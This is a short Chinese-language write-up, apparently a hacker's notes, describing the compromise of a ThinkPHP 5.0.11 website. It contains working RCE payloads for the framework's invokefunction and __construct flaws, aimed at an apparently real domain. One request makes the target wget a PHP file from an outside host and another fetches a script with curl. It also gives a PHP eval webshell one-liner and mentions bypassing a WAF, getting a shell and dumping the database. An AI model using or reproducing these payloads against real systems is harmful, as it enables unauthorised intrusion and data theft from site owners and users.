超级签名
首先看见是tp5.0.11,直接用exp打
然后准备用rce,但是发现了禁了一些函数,
此外,有waf,过滤了eval,assert,有点头疼
此外,还尝试很多payload,都没有打成功,
_method=__construct&filter[]=system&method=get&get[]=phpinfo
_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo
然后准备用0组的payload打
http://www.0-sec.org/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=curl https://www.hack.com/xxx.js 结果发现curl不管用,然后换用wget,结果还是报错了
然后将admin这个模块换为user,index都没有用,captcha,也没用用,最后用了一个portal这个模块,就能打了,附上payload
http://518.jd12558.com/index.php?s=portal/\think\app/invokefunction&function=call_user_func_array&vars[0]=exec&vars[l][]=wget%20https://dl.4y9011.cn/static/upload/images/chatImg/2020-07-06/fw.php
然后因为有waf,就不贴图了,什么情况呢,phpinfo能够执行,但是普通的一句话连接不上,然后我们看到他会转移,转义成这样
<?php @eval($_POST['cai']);?> 然后就是这这样构造去写小马,
\<\?php eval(\$\_POST\[cai\]); 还是连不上
然后就换了一个php7过waf的马
然后就连上了
拿下shell,连裤